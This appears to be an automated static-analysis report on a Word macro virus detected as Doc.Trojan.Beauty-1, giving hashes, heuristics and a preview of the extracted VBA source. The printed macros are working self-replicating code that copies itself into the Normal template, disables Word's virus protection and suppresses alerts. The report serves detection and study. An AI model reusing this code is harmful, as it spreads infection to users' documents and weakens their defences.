Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fa5f8aa4cd5683cc…

MALICIOUS

Office (OLE)

62.5 KB Created: 1998-01-01 00:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 165b68c73735f21c396f56227eea098f SHA-1: b10ede0f16cb5f06a6195f35c764aff0212ab134 SHA-256: fa5f8aa4cd5683ccc8bc1874a7f9b490c55cbc4060ced8814e56c6d96a42c796
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits high-severity heuristics for legacy WordBasic and VBA macros, including AutoOpen and AutoClose functions. The embedded VBA script attempts to copy itself to the Normal template using Organizer commands with names like 'lamo', 'p1', 'p2', and 'p3', indicating a likely attempt to establish persistence or spread.

Heuristics 5

  • ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Beauty-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21154 bytes
SHA-256: 4b483ac4cf377d7c09c749e96f2b93c733d746f20937ff65f68653c9ff772982
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Attribute VB_Name = "Beauty2"

Sub AutoClose()
Dim nor$
Dim fn$
Dim con
Dim c
Dim ca
Dim con1
Dim cc
Dim ca1
On Error Resume Next

Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
WordBasic.CurValues.FileSummaryInfo dlg
nor$ = dlg.Template
fn$ = WordBasic.[FileNameInfo$](WordBasic.[FileName$](), 1)

con = WordBasic.CountAutoTextEntries(0)
If con > 0 Then
   For c = 1 To con
      If WordBasic.[AutoTextName$](c, 0) = "lamo" Then ca = 1
   Next c
End If
If ca <> 1 Then

 WordBasic.Organizer Copy:=1, Source:=fn$, Destination:=nor$, Name:="lamo", Tab:=1
 WordBasic.Organizer Copy:=1, Source:=fn$, Destination:=nor$, Name:="p1", Tab:=1
 WordBasic.Organizer Copy:=1, Source:=fn$, Destination:=nor$, Name:="p2", Tab:=1
 WordBasic.Organizer Copy:=1, Source:=fn$, Destination:=nor$, Name:="p3", Tab:=1

End If

On Error Resume Next
    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate
    DocumentInstalled = False
    GlobalInstalled = False

    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "Beauty2" Then
            DocumentInstalled = True
        End If
    Next

    For j = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(j).Name = "Beauty2" Then
            GlobalInstalled = True
        End If
    Next

    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Beauty2", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
        
       
    End If

con1 = WordBasic.CountAutoTextEntries(1)
If con1 > 0 Then
  For cc = 1 To con1
     If WordBasic.[AutoTextName$](cc, 1) = "lamo" Then ca1 = 1
  Next cc
End If
If ca1 <> 1 Then
WordBasic.Organizer Copy:=1, Source:=nor$, Destination:=fn$, Name:="lamo", Tab:=1
WordBasic.Organizer Copy:=1, Source:=nor$, Destination:=fn$, Name:="p1", Tab:=1
WordBasic.Organizer Copy:=1, Source:=nor$, Destination:=fn$, Name:="p2", Tab:=1
WordBasic.Organizer Copy:=1, Source:=nor$, Destination:=fn$, Name:="p3", Tab:=1
End If

    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Beauty2", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
        
     

End If
Application.DisplayAlerts = wdAlertsAll

WordBasic.DocClose 1

If WordBasic.Day(WordBasic.Now()) = WordBasic.Int(Rnd() * 30) + 1 Then
WordBasic.Call "game"
End If


exit_:
End Sub
Sub FileClose()
Dim nor$
Dim fn$
Dim con
Dim c
Dim ca
Dim con1
Dim cc
Dim ca1
On Error Resume Next

Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
WordBasic.CurValues.FileSummaryInfo dlg
nor$ = dlg.Template
fn$ = WordBasic.[FileNameInfo$](WordBasic.[FileName$](), 1)

con = WordBasic.CountAutoTextEntries(0)
If con > 0 Then
   For c = 1 To con
      If WordBasic.[AutoTextName$](c, 0) = "lamo" Then ca = 1
   Next c
End If
If ca <> 1 Then

 WordBasic.Organizer Copy:=1, Source:=fn$, Destination:=nor$, Name:="lamo", Tab:=1
 WordBasic.Organizer Copy:=1, Source:=fn$, Destination:=nor$, Name:="p1", Tab:=1
 WordBasic.Organizer Copy:=1, Source:=fn$, Destination:=nor$, Name:="p2", Tab:=1
 WordBasic.Organizer Copy:=1, Source:=fn$, Destination:=nor$, Name:="p3", Tab:=1

End If

On Error Resume Next
    Application.ScreenUpdating = False
    Application.Displa
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.